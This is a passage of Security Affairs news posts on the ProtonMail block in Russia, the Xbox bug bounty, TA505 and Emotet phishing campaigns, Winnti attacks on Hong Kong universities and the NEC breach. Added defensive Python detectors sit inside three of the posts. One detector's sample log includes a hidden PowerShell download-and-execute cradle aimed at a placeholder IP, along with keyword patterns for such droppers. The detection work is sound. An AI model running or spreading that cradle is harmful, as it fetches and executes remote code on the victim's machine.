This week the Russian government also blocked the ProtonMail end-to-end encrypted email service and the ProtonVPN VPN service. On January 29, Roskomnadzor announced that, at the request of the General Prosecutor’s Office, it would restrict access to Protonmail.com, stating that the service had been used by cybercriminals to send false bomb threats and that Proton Technologies had refused both to register with the state authorities and to provide information about the owners of the mailboxes used to send the threats.

Pierluigi Paganini

(SecurityAffairs – United Nations, hacking)

The post Russia’s watchdog Roskomnadzor threatens to fine Twitter and Facebook appeared first on Security Affairs.

The Russian Government blocked ProtonMail and ProtonVPN

The popular ProtonMail end-to-end encrypted email service and ProtonVPN VPN service have been blocked by the Russian government this week.

This week the Russian government has blocked the ProtonMail end-to-end encrypted email service and ProtonVPN VPN service.

Roskomnadzor explained that the services were abused by cybercriminals and that Proton Technologies refused to register them with the state authorities. The Russian government requires all Internet service providers and VPN providers operating in the country to provide information about their users.

“On January 29, based on the requirements of the General Prosecutor’s Office of the Russian Federation, Roskomnadzor will restrict access to the mail service Protonmail.com (Switzerland),” reads a press release published by Roskomnadzor, Russia’s telecommunications watchdog.

“This email service was used by cybercriminals both in 2019 and especially actively in January 2020 to send false messages under the guise of reliable information about mass mining of objects in the Russian Federation,” 

Roskomnadzor decided to block the Proton Technologies services after the company refused to provide information about the owners of the mailboxes used to send the bomb threats.

“The company responded with a categorical refusal to Roskomnadzor’s repeated requests for information to be included in the register of information dissemination organizers on the Internet. Information about the administrators of the mailboxes used to send threats has not been provided.” continues the Russian Watchdog.

“In accordance with the procedure enshrined in the legislation, Roskomnadzor consistently restricts access to resources used by criminals to destabilize the situation in the country and increase tension, and expects effective interaction with all parties involved.”

Proton Technologies confirmed that its services have been blocked in Russia and recommends using the Tor network to bypass the censorship.

“We have received reports that Proton is currently blocked in Russia. We are reaching out to the appropriate authorities to get the block lifted as soon as possible. This block affects ProtonMail and ProtonVPN users who were not logged in before the block was implemented.” states Proton Technologies. “For now, we recommend using the TOR network (via the TOR Browser) to access our services.

To quickly access the Proton websites with the TOR browser:

  1. Download the TOR browser for your device here: https://www.torproject.org/download/
  2. Install the TOR browser
  3. Once the browser is installed, launch it and you will be able to access the Proton websites”

ProtonMail condemned the choice of the Russian Government to block its services.

Pierluigi Paganini

(SecurityAffairs – ProtonMail, censorship)

The post The Russian Government blocked ProtonMail and ProtonVPN appeared first on Security Affairs.

Microsoft announces the launch of a bug bounty program for Xbox

Microsoft announced the launch of an Xbox bug bounty program with rewards of up to $20,000 for critical remote code execution flaws.

Microsoft is going to launch an Xbox bug bounty program that will pay rewards of up to $20,000 for critical remote code execution vulnerabilities.

“The Xbox Bounty Program invites gamers, security researchers, and others around the world to help identify security vulnerabilities in the Xbox Live network and services and share them with the Xbox team. Qualified submissions are eligible for bounty rewards of $500 to $20,000 USD.” reads the program description.

“Bounties will be awarded at Microsoft’s discretion based on the severity and impact of the vulnerability and the quality of the submission, and subject to the Microsoft Bounty Terms and Conditions.”

The bug bounty program will pay for vulnerabilities in the Xbox Live network and services. The list of eligible vulnerability types includes cross-site scripting (XSS), cross-site request forgery (CSRF), IDOR, insecure, injection, server-side code execution, and significant security misconfiguration (when not caused by the user).

The vulnerabilities can lead to remote code execution, elevation of privileges, security bypass, information disclosure, spoofing, or tampering. Denial-of-service (DoS) flaws are out of scope.

Bounty awards range from $500 up to $20,000. Higher awards are possible, at Microsoft’s sole discretion, based on report quality and vulnerability impact. Researchers who provide submissions that do not qualify for bounty awards may still be eligible for public acknowledgment if their submission leads to a vulnerability fix.

Bounty awards by security impact, report quality and severity (Critical / Important / Moderate / Low):

Security Impact          Report Quality   Critical   Important   Moderate   Low
Remote Code Execution    High             $20,000    $15,000     N/A        N/A
                         Medium           $15,000    $10,000     N/A        N/A
                         Low              $10,000    $5,000      N/A        N/A
Elevation of Privilege   High             $8,000     $5,000      $0         N/A
                         Medium           $4,000     $2,000      $0         N/A
                         Low              $3,000     $1,000      $0         N/A
Security Feature Bypass  High             N/A        $5,000      $0         N/A
                         Medium           N/A        $2,000      $0         N/A
                         Low              N/A        $1,000      $0         N/A
Information Disclosure   High             N/A        $5,000      $0         $0
                         Medium           N/A        $2,000      $0         $0
                         Low              N/A        $1,000      $0         $0
Spoofing                 High             N/A        $5,000      $0         $0
                         Medium           N/A        $2,000      $0         $0
                         Low              N/A        $1,000      $0         $0
Tampering                High             N/A        $5,000      $0         $0
                         Medium           N/A        $2,000      $0         $0
                         Low              N/A        $1,000      $0         $0
Denial of Service        High/Low         Out of scope

Hackers that report remote code execution flaws can earn between $5,000 and $20,000, while privilege escalation vulnerabilities could be rewarded with payouts between $1,000 and $8,000. The remaining issues will be paid between $1,000 and $5,000.

Microsoft will review every submission on a case-by-case basis; however, some common low-severity issues that are out of scope and typically do not earn bounty rewards are:

  • Server-side information disclosure such as IPs, server names and most stack traces
  • Low impact CSRF bugs (such as logoff)
  • Denial of Service issues
  • Issues relating to Fraud
  • Sub-Domain Takeovers
  • Cookie replay vulnerabilities
  • URL Redirects (unless combined with another vulnerability to produce a more severe vulnerability)

“Since launching in 2002, the Xbox network has enabled millions of users to share their common love of gaming on a safe and secure service. The bounty program supplements our existing investments in security development and testing to uncover and remediate vulnerabilities which have a direct and demonstrable impact on the security of Xbox customers,” reads the announcement published by Microsoft.

Pierluigi Paganini

(SecurityAffairs – Xbox, hacking)

The post Microsoft announces the launch of a bug bounty program for Xbox appeared first on Security Affairs.

Security Affairs newsletter Round 249

A new round of the weekly newsletter arrived! The best news of the week with Security Affairs

Authorities arrest 3 Indonesian hackers behind many Magecart attacks
City of Potsdam offline following a cyberattack
A new piece of Ryuk Stealer targets government, military and finance sectors
Aggah: How to run a botnet without renting a Server (for more than a year)
Did H&M spy on its German employees? Privacy watchdog opens an investigation
Mozilla banned hundreds of malicious Firefox add-ons over the last weeks
Operation Night Fury: Group-IB helps take down a cybergang behind the infection of hundreds of websites all over the world
Which was the most common threat to macOS devices in 2019? Shlayer malware
A new piece of Snake Ransomware targets ICS processes
Attacks on Citrix servers increase after the release of CVE-2019-19781 exploits
Cyber Threat Trends Dashboard
Fortinet removed hardcoded SSH keys and database backdoors from FortiSIEM
A vulnerability in Zoom platform allowed miscreants to join Zoom meetings
CVE-2020-7247 RCE flaw in OpenSMTPD library affects many BSD and Linux distros
Magento 2.3.4 addresses three critical Code execution flaws
Phantom of the ADAS – Phantom Attacks Against Advanced Driving Assistance Systems
Wawa card breach: 30 million card records for sale in the dark web
Check Point detailed two flaws in Microsoft Azure that could have allowed taking over cloud servers
Cisco Small Business Switches affected by DoS and information disclosure flaws
Leaked confidential report states United Nations has been hacked
Over 200K WordPress sites potentially exposed to hack due to Code Snippets flaw
US Govn contractor Electronic Warfare Associates infected with Ryuk ransomware
Hackers penetrated NEC defense business division in 2016
Iran-linked APT34 group is targeting US federal workers
NIST Tests Forensic Methods for Getting Data From Damaged Mobile Phones
Report: Threat of Emotet and Ryuk
US continues to press EU members to ban Huawei and Chinese 5G technologies
Crooks start exploiting Coronavirus as bait to spread malware
Winnti APT Group targeted Hong Kong Universities

Pierluigi Paganini

(SecurityAffairs – newsletter, hacking)

The post Security Affairs newsletter Round 249 appeared first on Security Affairs.

Microsoft warns TA505 changed tactic in an ongoing malware campaign

An ongoing phishing campaign launched by TA505 is using attachments featuring HTML redirectors for delivering malicious Excel docs

Security experts from Microsoft have uncovered an ongoing phishing campaign launched by the TA505 cybercrime gang (aka Evil Corp) that is employing attachments featuring HTML redirectors for delivering malicious Excel docs.

According to Microsoft, this is the first time that the TA505 group is using this tactic.

The TA505 hacking group has been active since 2014, focusing on the retail and banking sectors. The group is also known for the evasive techniques it has adopted over time to bypass security controls and penetrate corporate perimeters with several kinds of malware, for instance abusing so-called LOLBins (Living Off The Land Binaries), legitimate programs regularly used by victims, or abusing validly signed payloads.

The TA505 group was involved in campaigns aimed at distributing the Dridex banking Trojan, along with Locky, BitPaymer, Philadelphia, GlobeImposter, and Jaff ransomware families.

Security experts from cyber-security firm Prevailion reported that TA505 has compromised more than 1,000 organizations.

“During our analysis of this campaign we were able to identify at least one U.S. based electrical company, a U.S. state government network, and one of the world’s largest twenty-five banks exhibiting evidence of compromise. The map below denotes organizations that present EoC associated with TA505 indicators.” reads the analysis published by Prevailion.

Now Microsoft has confirmed that it observed an ongoing “Dudear (aka TA505, Evil Corp)” phishing campaign distributing an information stealer tracked as GraceWire (aka FlawedGrace).

“This is the first time that Dudear is observed using HTML redirectors. The attackers use HTML files in different languages. Notably, they also use an IP traceback service to track the IP addresses of machines that download the malicious Excel file.” Tweeted Microsoft.

Experts from Microsoft revealed that the attackers are using HTML redirectors attached to emails. Once the victim opens the attachment, the HTML leads to the download of a weaponized Excel file that drops the final payload. This is the first time TA505 has used this technique; in the past, the group sent spam messages carrying the malware as an attachment or pointing to malicious URLs.

The victims are then tricked into opening the Excel document, on the pretext that online previewing is not available, and into enabling editing of the file to access its content.

“Once you have enabled editing, please click Enable Content from the yellow bar above,” the bait Microsoft Office doc adds.

Experts pointed out that operators behind this phishing campaign also use localized HTML files in different languages to target users worldwide.

The attackers are able to track the IP addresses of machines that download the malicious Excel file by using an IP traceback service.

Microsoft Security Intelligence provides a full list of indicators of compromise (IOCs) via Twitter.

The good news is that Microsoft Security Intelligence has confirmed that Microsoft Threat Protection is able to neutralize the attack. Office 365 detects the malicious attachments and URLs employed in this campaign, and Microsoft Defender ATP detects the malicious HTML, the Excel file and the payload used by TA505.
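The HTML-redirector lure described above can be triaged before a user ever opens it: an HTML attachment that navigates away from itself as soon as it loads (a meta refresh or a script assigning to location), especially toward an Office document or a bare IP address, has no legitimate reason to be in a mail. The following is an added example, not code from the original post or from Microsoft; the attachment content, the files.example.invalid host and the 203.0.113.10 address are constructed placeholders.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample resembling an HTML "redirector" attachment: a meta refresh
# that fetches a spreadsheet, plus an inline script that beacons to a bare IP.
# The hostname and the 203.0.113.10 address are documentation/placeholder values.
SAMPLE_HTML = """<html><head>
<meta http-equiv="refresh" content="0; url=https://files.example.invalid/report_2020.xls">
</head><body>Loading document...
<script>
setTimeout(function () { window.location.href = "http://203.0.113.10/track.php"; }, 500);
</script></body></html>"""

OFFICE_EXT = (".xls", ".xlsx", ".xlsm", ".xlsb", ".doc", ".docx", ".docm")
_JS_REDIRECT = re.compile(
    r"location(?:\.href)?\s*=\s*['\"]([^'\"]+)['\"]"   # location = "..." / location.href = "..."
    r"|location\.replace\(\s*['\"]([^'\"]+)['\"]"      # location.replace("...")
)
_META_URL = re.compile(r"url\s*=\s*['\"]?([^'\";\s]+)", re.I)
_BARE_IP = re.compile(r"^\d{1,3}(?:\.\d{1,3}){3}$")


class _RedirectCollector(HTMLParser):
    """Collects redirect targets from <meta http-equiv=refresh> and inline <script> bodies."""

    def __init__(self):
        super().__init__()
        self.redirects = []      # list of (mechanism, url) in document order
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}   # HTMLParser already lowercases attribute names
        if tag == "meta" and a.get("http-equiv", "").lower() == "refresh":
            m = _META_URL.search(a.get("content", ""))
            if m:
                self.redirects.append(("meta-refresh", m.group(1)))
        elif tag == "script":
            self._in_script = True

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        # Script bodies are delivered to handle_data while inside <script>...</script>
        if self._in_script:
            for m in _JS_REDIRECT.finditer(data):
                self.redirects.append(("script", m.group(1) or m.group(2)))


def scan_html_attachment(html: str) -> dict:
    """Return the redirect targets found in an HTML attachment and why they look suspicious."""
    p = _RedirectCollector()
    p.feed(html)
    p.close()
    reasons = []
    for mechanism, url in p.redirects:
        parsed = urlparse(url)
        reasons.append(f"{mechanism} redirect to {url}")
        if parsed.path.lower().endswith(OFFICE_EXT):
            reasons.append(f"redirect target is an Office document: {parsed.path.rsplit('/', 1)[-1]}")
        if parsed.hostname and _BARE_IP.match(parsed.hostname):
            reasons.append(f"redirect target uses a bare IP address: {parsed.hostname}")
    return {
        "redirects": p.redirects,
        "reasons": reasons,
        # Any load-time redirect in a mailed HTML file is enough to quarantine it for review
        "verdict": "suspicious" if p.redirects else "benign",
    }


if __name__ == "__main__":
    result = scan_html_attachment(SAMPLE_HTML)
    print(result["verdict"])
    for reason in result["reasons"]:
        print(" -", reason)
```

The verdict is deliberately binary on the presence of any redirect; the extra reasons (Office document target, bare IP) are there so an analyst reading the alert sees why the file matches the pattern reported for this campaign rather than only that it matched.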

Pierluigi Paganini

(SecurityAffairs – TA505, hacking)

The post Microsoft warns TA505 changed tactic in an ongoing malware campaign appeared first on Security Affairs.

Crooks start exploiting Coronavirus as bait to spread malware

Security researchers warn of malspam campaigns aimed at spreading malware that exploits media attention on the coronavirus epidemic.

Unscrupulous cybercriminal groups are attempting to exploit media attention on the coronavirus to infect systems worldwide.

Recently, the coronavirus has been monopolizing media attention; users online are searching for information about the virus and the way it is rapidly spreading worldwide.

In this scenario, it is quite easy for crooks to use this topic to trick victims into opening weaponized documents or visiting malicious websites.

Terms such as ‘Wuhan’ (the city that is considered the epicenter of infection) and ‘coronavirus’ are trend topics on social networks.

Cybercrime groups have already started malspam attacks that attempt to take advantage of the high interest of online users in the topic; we have observed similar scenarios in the past, immediately after natural disasters and other tragedies.

Mindful of what has happened in the past, I immediately alerted the group of researchers from the Cybaze-Yoroi Z-Lab malware laboratory, asking them to remain vigilant for any spam campaigns aimed at distributing malicious code by spreading bait documents that promise information about the coronavirus.

While media were confirming the first cases of coronavirus infection, the researchers of Cybaze-Yoroi Z-Lab observed bait spam emails promising info on the virus; the messages were used to spread versions of the well-known Emotet malware.

Researchers from Z-Lab confirmed that, at the time of their analysis, attackers were using specially crafted messages to lure victims into opening weaponized Office documents. The bait documents contained macros used to download the malware, while the versions of Emotet used are the same as those observed in campaigns in recent months.

According to security firm Kaspersky, attackers are using several types of malicious files, including pdf, mp4 and docx, with a “coronavirus” theme to spread malware. Many of the files used in the attacks observed by the experts in recent hours are presented as documents containing information about the virus, its diffusion, and instructions on how to prevent contagion.

The bait documents are used to deliver several types of malware, including banking Trojans, ransomware and worms.

“We have only observed 10 unique files but, as often happens with topics of general interest, we expect this trend to grow. Given that this is a topic that is generating great concern among people all over the world, we are confident that we will detect more and more malware hiding behind false documents on the spread of the coronavirus,” explained Anton Ivanov, Kaspersky’s malware analyst.

Security experts from IBM X-Force published a more technical report that describes an ongoing campaign targeting Japanese users in an attempt to spread the Emotet malware.

“X-Force discovered the first campaign of this type, in which the outbreak of a biological virus is used as a means to distribute a computer virus. What makes these attacks rather special, is the fact that they deliver the Emotet trojan, which has shown increased activity recently.” reads the analysis published by IBM. “It achieves this by urging its victims into opening an attached Word document, described as a supposed notice regarding infection prevention measures.”

IBM confirmed that crooks were exploiting interest in the coronavirus to spread the Emotet banking trojan through bait Word documents spread via e-mail.

“By analyzing the indicators of compromise provided by IBM X-FORCE, I can confirm that the EMOTET variant employed in this “coronavirus” campaign has already been widely used in past “corporate style payment” campaigns. The fingerprint associated with this malware links to fake invoice documents recently observed in most EMOTET campaigns,” explained Antonio Pirozzi, head of Cybaze-Yoroi Zlab.

“The report published by Kaspersky includes signatures collected by its telemetry, some of them confirm the presence of different possible active campaigns delivering other families of malware. Kaspersky researchers have identified only ten unique files, as reported by the malware analyst Anton Ivanov, but obviously this is an indication that several actors are exploiting the attention on the coronavirus topic, and the trend could grow in the next hours.”

IBM provides some examples of e-mails apparently sent by a disability welfare service provider in Japan.


The text of the messages states that there have been reports of coronavirus infections in some prefectures in Japan and urges the reader to view the attached document.

"Jurisdiction tsusho / facility related disability welfare service provider. We become indebted to. Patients were reported about the new type of coronavirus-related pneumonia, mainly in Takeshi, China. In Japan, patients are being reported in Osaka Prefecture. Along with the anticipated increase in the number of visitors to Japan, a separate notice has been issued. Therefore, please check the attached notice," reads the content of the email.

Following a consolidated infection pattern, once the document has been opened, the user is shown a request to enable macros in order to view its contents. Unfortunately, by enabling macros, the infection process starts: a PowerShell command is silently executed to download and install a version of the Emotet trojan.

“After running the document through a sandbox, we could retrace the infection process. If the attachment of sample 3 has been opened with macros enabled, an obfuscated VBA macro script opens powershell and installs an Emotet downloader in the background. This is the typical behaviour of most Emotet documents.” continues IBM.
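The infection chain IBM describes, a Word document whose macro launches PowerShell to fetch the downloader, leaves a very recognisable trace on the endpoint: an Office process as the parent of a script host, often with a hidden window and an encoded or download-oriented command line. The detection below is an added example, not code from the original post or from IBM or Kaspersky; it runs over constructed process-creation records in a Sysmon Event ID 1-like shape, and the paths, user names, the 203.0.113.10 address and the encoded command (the Base64 of the harmless `$a=1`) are all invented.

```python
import json

# Constructed process-creation events (Sysmon Event ID 1-like fields). The paths, users,
# 203.0.113.10 and the encoded command (Base64 of the harmless "$a=1") are invented.
SAMPLE_LOG = r"""
{"UtcTime":"2020-01-30 09:12:01","Image":"C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE","ParentImage":"C:\\Windows\\explorer.exe","CommandLine":"\"WINWORD.EXE\" /n C:\\Users\\user1\\Downloads\\notice.doc","User":"CORP\\user1"}
{"UtcTime":"2020-01-30 09:12:09","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentImage":"C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE","CommandLine":"powershell -nop -w hidden -enc JABhAD0AMQA=","User":"CORP\\user1"}
{"UtcTime":"2020-01-30 09:15:30","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentImage":"C:\\Windows\\explorer.exe","CommandLine":"powershell Get-Service -Name Spooler","User":"CORP\\admin1"}
{"UtcTime":"2020-01-30 09:20:44","Image":"C:\\Windows\\System32\\cmd.exe","ParentImage":"C:\\Program Files\\Microsoft Office\\root\\Office16\\EXCEL.EXE","CommandLine":"cmd /c powershell -w hidden IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.10/stage')","User":"CORP\\user2"}
"""

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe", "msaccess.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe",
                "mshta.exe", "regsvr32.exe", "rundll32.exe"}
# Command-line fragments typical of macro droppers: hidden window, encoded command, download cradle
SUSPICIOUS_ARGS = ["-enc", "-encodedcommand", "-w hidden", "-windowstyle hidden", "-nop",
                   "downloadstring", "downloadfile", "invoke-webrequest", "net.webclient", "iex "]
_ORDER = {"low": 0, "medium": 1, "high": 2}


def basename(path: str) -> str:
    """Lower-cased file name of a Windows path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def parse_log(text: str) -> list:
    """One JSON object per non-empty line."""
    return [json.loads(line) for line in text.splitlines() if line.strip()]


def score_event(ev: dict):
    """Return (severity or None, reasons) for one process-creation event."""
    parent, child = basename(ev["ParentImage"]), basename(ev["Image"])
    cmd = ev.get("CommandLine", "").lower()
    reasons = []
    office_spawn = parent in OFFICE_APPS and child in SCRIPT_HOSTS
    if office_spawn:
        reasons.append(f"{parent} spawned {child}")
    hits = [a for a in SUSPICIOUS_ARGS if a in cmd]
    if hits:
        reasons.append("suspicious arguments: " + ", ".join(hits))
    if office_spawn and hits:
        return "high", reasons        # Office -> script host with a dropper-style command line
    if office_spawn:
        return "medium", reasons      # Office -> script host alone is already unusual
    if hits:
        return "low", reasons         # hidden/encoded/download flags from a non-Office parent
    return None, reasons


def detect(events: list, min_severity: str = "medium") -> list:
    """Alerts for events at or above min_severity, in log order."""
    alerts = []
    for ev in events:
        sev, reasons = score_event(ev)
        if sev and _ORDER[sev] >= _ORDER[min_severity]:
            alerts.append({"time": ev["UtcTime"], "user": ev["User"],
                           "severity": sev, "reasons": reasons})
    return alerts


if __name__ == "__main__":
    for alert in detect(parse_log(SAMPLE_LOG)):
        print(alert["time"], alert["user"], alert["severity"], "; ".join(alert["reasons"]))
```

The administrator's interactive `Get-Service` call in the sample produces no alert because neither condition holds for it; that is the point of keying the rule on the parent process rather than on PowerShell alone, which would be far too noisy in any environment that manages Windows with it.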

What will happen in the next few weeks?

In the coming weeks, a growing number of threat actors will exploit the coronavirus theme; let me suggest following some simple tips to prevent infection:

  • Do not open suspicious links inviting you to view coronavirus information. These links can be spread through email, instant messaging app messages such as WhatsApp, and also social networks. Always search for coronavirus information from reliable and legitimate sources, ignore any unsolicited messages, even if they come from people you trust.
  • Keep your software up to date, and use reliable security solutions on your desktop and mobile systems.

Pierluigi Paganini

(SecurityAffairs – coronavirus, hacking)

The post Crooks start exploiting Coronavirus as bait to spread malware appeared first on Security Affairs.

Winnti APT Group targeted Hong Kong Universities

Winnti Group has compromised computer systems at two Hong Kong universities during the Hong Kong protests that started in March 2019.

Hackers from the China-linked Winnti group have compromised computer systems at two Hong Kong universities during the Hong Kong protests that started in March 2019.

Researchers from ESET discovered the attacks in November 2019 when they spotted the ShadowPad launcher malware samples on multiple devices at the two universities. The launchers were discovered two weeks after Winnti malware infections were detected in October 2019.

“In November 2019, we discovered a new campaign run by the Winnti Group against two Hong Kong universities. We found a new variant of the ShadowPad backdoor, the group’s flagship backdoor, deployed using a new launcher and embedding numerous modules.” reads the analysis published by ESET. “The Winnti malware was also found at these universities a few weeks prior to ShadowPad.”

The Winnti group was first spotted by Kaspersky in 2013, but according to the researchers the gang has been active since 2007.

The experts believe that under the Winnti umbrella there are several APT groups, including Winnti, Gref, PlayfullDragon, APT17, DeputyDog, Axiom, BARIUM, LEAD, PassCV, Wicked Panda, and ShadowPad.

Experts discovered samples from both ShadowPad and Winnti at the universities that contained campaign identifiers and C&C URLs with the names of the universities, a circumstance that indicates a highly targeted attack.

“One can observe that the C&C URL used by both Winnti and ShadowPad complies to the scheme [backdoor_type][target_name].domain.tld:443 where [backdoor_type] is a single letter which is either “w” in the case of the Winnti malware or “b” in the case of ShadowPad.” continues the report.

“From this format, we were able to find several C&C URLs, including three additional Hong Kong universities’ names. The campaign identifiers found in the samples we’ve analyzed match the subdomain part of the C&C server, showing that these samples were really targeted against these universities.”

Analyzing the C&C URL format, experts determined that hackers targeted three additional Hong Kong universities.
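The naming scheme ESET describes, a one-letter family prefix and the target name in the leftmost label of the C&C hostname, is exactly the kind of structure a threat hunter can turn into a small tool: decode observed endpoints, check that a sample's embedded campaign identifier really matches the host it talks to, and enumerate targets from passive-DNS hostnames under the same C&C domain. The code below is an added example, not ESET's tooling; the campaign identifiers, the univa/univb/univc/univd target names and the c2.example.invalid domain are constructed placeholders.

```python
import re

# Family prefixes as described in the ESET report: "w" for Winnti, "b" for ShadowPad
BACKDOOR_FAMILY = {"w": "Winnti", "b": "ShadowPad"}

# Constructed sample data: campaign identifiers pulled from samples and the C&C endpoint
# each sample contacts. Target names and the c2.example.invalid domain are placeholders.
SAMPLES = [
    {"sample": "sample-A", "campaign_id": "univa", "c2": "wuniva.c2.example.invalid:443"},
    {"sample": "sample-B", "campaign_id": "univa", "c2": "buniva.c2.example.invalid:443"},
    {"sample": "sample-C", "campaign_id": "univb", "c2": "bunivc.c2.example.invalid:443"},  # mismatch
]
# Constructed passive-DNS observations under the C&C domain
PASSIVE_DNS = [
    "wuniva.c2.example.invalid", "buniva.c2.example.invalid", "bunivb.c2.example.invalid",
    "wunivc.c2.example.invalid", "mail.c2.example.invalid", "bunivd.c2.example.invalid",
]

_C2 = re.compile(
    r"^(?P<sub>[a-z0-9-]+)\.(?P<domain>(?:[a-z0-9-]+\.)+[a-z]+)(?::(?P<port>\d+))?$", re.I
)


def parse_c2(endpoint: str):
    """Decode [backdoor_type][target_name].domain.tld[:port]; None if it does not fit the scheme.

    The scheme is only meaningful for hostnames under a known C&C domain: any label that
    happens to start with "w" or "b" would otherwise be mis-read as a target name, so callers
    should filter on the domain and cross-check the sample's campaign identifier.
    """
    m = _C2.match(endpoint.strip().lower())
    if not m or m["sub"][0] not in BACKDOOR_FAMILY:
        return None
    sub = m["sub"]
    return {
        "family": BACKDOOR_FAMILY[sub[0]],
        "target": sub[1:],
        "domain": m["domain"],
        "port": int(m["port"]) if m["port"] else 443,   # 443 is the port in the reported scheme
    }


def sample_matches_c2(sample: dict) -> bool:
    """True when the campaign identifier embedded in a sample equals the target in its C&C host."""
    info = parse_c2(sample["c2"])
    return info is not None and info["target"] == sample["campaign_id"]


def targets_from_hostnames(hostnames, domain: str) -> list:
    """(family, target) pairs for hostnames under the given C&C domain that fit the scheme."""
    found = set()
    for host in hostnames:
        info = parse_c2(host)
        if info and info["domain"] == domain.lower():
            found.add((info["family"], info["target"]))
    return sorted(found)


if __name__ == "__main__":
    for s in SAMPLES:
        print(s["sample"], parse_c2(s["c2"]), "campaign matches:", sample_matches_c2(s))
    print(targets_from_hostnames(PASSIVE_DNS, "c2.example.invalid"))
```

Sample-C in the constructed data illustrates the cross-check ESET performed in reverse: a campaign identifier that does not match the host's target label is a prompt to look again at the sample rather than a confirmed victim; the passive-DNS pass is how the "additional universities" in the report would surface from a single known C&C domain.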

The ShadowPad multi-modular backdoor employed in the attacks against the Hong Kong universities referenced 17 modules, focused on info-stealing, that were used to collect information from infected systems.

“In contrast, the variants we described in our white paper didn’t even have that module embedded.” continues the report.


Unlike the previous variants of the ShadowPad backdoor detailed in the ESET white paper on the arsenal of the Winnti Group, this launcher is not obfuscated using VMProtect, and it uses XOR encryption rather than the typical RC5 key block encryption algorithm.

Other technical details are reported in ESET’s analysis, including Indicators of Compromise (IoCs).

Pierluigi Paganini

(SecurityAffairs – APT, hacking)

The post Winnti APT Group targeted Hong Kong Universities appeared first on Security Affairs.

Hackers penetrated NEC defense business division in 2016

Japanese electronics and IT giant NEC confirmed a security breach suffered by its defense business division in December 2016.

The IT giant NEC confirmed that its defense business division suffered a security breach back in December 2016.

The Japanese firm confirmed the unauthorized access to its internal network after Japanese newspapers disclosed the security incident citing sources informed of the event.

NEC is a contractor for Japan’s defense industry and was involved in various defense projects.

Roughly 28,000 files were found by the company on one of the compromised servers, some of them containing information about defense equipment.

“In July 2018, we succeeded in decrypting encrypted communication with an infected server and an external server that was performing unauthorized communication, and stored it on our internal server for information sharing with other departments used by our defense business division, 27,445 files were found to have been accessed illegally.

As a result of investigations conducted by the Company and external specialized organizations, no damage such as information leakage has been confirmed so far.” reads the statement from the company.

“These files do not contain confidential information or personal information. In addition, since July 2018, the situation has been individually explained to customers related to files that have been accessed illegally,”

The situation is different according to the Nikkei newspaper that reported that the Japanese Ministry of Defense said that the exposed files contained “information on contracts with NEC, not defense secrets, and there is no impact on Japan’s defense system.”

NEC was informed of the intrusion in July 2017 by a security company contracted by the electronics company to investigate alleged unauthorized accesses to the internal network.

In July 2018, the company was able to decrypt unauthorized communications between an internal server and an external machine and discovered further compromise.

NEC announced it has taken steps to improve the security of its infrastructure and prevent future intrusions.

Recently, another Japanese multinational electronics giant disclosed a data breach: last week Mitsubishi Electric disclosed a security breach that might have exposed personal and confidential corporate data. According to the company, the attackers did not obtain sensitive information about defense contracts.

The breach was detected almost eight months ago, on June 28, 2019, with the delay being attributed to the increased complexity of the investigation caused by the attackers deleting activity logs. Mitsubishi Electric disclosed the security incident only after two local newspapers, the Asahi Shimbun and Nikkei, reported the security breach.

The attackers have exploited a directory traversal and arbitrary file upload vulnerability, tracked as CVE-2019-18187, in the Trend Micro OfficeScan antivirus.

Trend Micro has since addressed the vulnerability, but we cannot exclude that the hackers have exploited the same issue in attacks against other targets. When the security firm patched the CVE-2019-18187 flaw in October, it warned customers that the issue was being actively exploited by hackers in the wild.

Pierluigi Paganini

(SecurityAffairs – NEC, hacking)

The post Hackers penetrated NEC defense business division in 2016 appeared first on Security Affairs.

US continues to press EU members to ban Huawei and Chinese 5G technologies

The United States appreciated European Union’s new rules on 5G networks, but pressed them to ban China’s Huawei technology.

The EU’s executive Commission this week presented a set of rules and technical measures aimed at reducing cybersecurity risks from the adoption of 5G networks. The Commission’s recommendations include blocking high-risk equipment suppliers from “critical and sensitive” components of 5G infrastructures, such as the core.

“As many critical services will depend on 5G, ensuring the security of our networks is of high strategic importance for the entire European Union,” the EU’s executive vice president overse